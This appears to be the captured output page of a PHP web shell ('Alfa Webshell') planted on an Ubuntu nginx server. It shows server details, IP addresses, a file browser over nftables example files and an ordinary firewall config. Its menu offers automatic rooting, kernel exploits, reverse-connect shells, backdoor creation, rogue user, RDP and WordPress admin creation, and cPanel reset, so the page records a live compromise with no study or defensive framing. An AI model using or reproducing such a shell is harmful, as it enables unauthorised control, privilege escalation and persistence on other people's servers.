Linux ubuntu 6.8.0-90-generic #91-Ubuntu SMP PREEMPT_DYNAMIC Tue Nov 18 14:14:30 UTC 2025 x86_64
nginx/1.24.0
: 67.217.245.49 | : 216.73.216.153
Cant Read [ /etc/named.conf ]
8.3.6
www-data
Bypass.pw
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
nftables /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
sysvinit
[ DIR ]
drwxr-xr-x
README
475
B
-rw-r--r--
all-in-one.nft
1016
B
-rw-r--r--
arp-filter.nft
129
B
-rw-r--r--
bridge-filter.nft
197
B
-rw-r--r--
ct_helpers.nft
1.23
KB
-rwxr-xr-x
inet-filter.nft
187
B
-rw-r--r--
inet-nat.nft
251
B
-rw-r--r--
ipv4-filter.nft
182
B
-rw-r--r--
ipv4-mangle.nft
74
B
-rw-r--r--
ipv4-nat.nft
246
B
-rw-r--r--
ipv4-raw.nft
137
B
-rw-r--r--
ipv6-filter.nft
186
B
-rw-r--r--
ipv6-mangle.nft
78
B
-rw-r--r--
ipv6-nat.nft
253
B
-rw-r--r--
ipv6-raw.nft
141
B
-rw-r--r--
load_balancing.nft
1.81
KB
-rwxr-xr-x
nat.nft
1.14
KB
-rwxr-xr-x
netdev-ingress.nft
128
B
-rw-r--r--
overview.nft
1.05
KB
-rwxr-xr-x
pf.os
28.21
KB
-rw-r--r--
secmark.nft
2.35
KB
-rwxr-xr-x
sets_and_maps.nft
1.25
KB
-rwxr-xr-x
workstation.nft
817
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : workstation.nft
#!/usr/sbin/nft -f flush ruleset table inet filter { chain input { type filter hook input priority 0; # accept any localhost traffic iif lo accept # accept traffic originated from us ct state established,related accept # activate the following line to accept common local services #tcp dport { 22, 80, 443 } ct state new accept # ICMPv6 packets which must not be dropped, see https://tools.ietf.org/html/rfc4890#section-4.4.1 meta nfproto ipv6 icmpv6 type { destination-unreachable, packet-too-big, time-exceeded, parameter-problem, echo-reply, echo-request, nd-router-solicit, nd-router-advert, nd-neighbor-solicit, nd-neighbor-advert, 148, 149 } accept ip6 saddr fe80::/10 icmpv6 type { 130, 131, 132, 143, 151, 152, 153 } accept # count and drop any other traffic counter drop } }
Close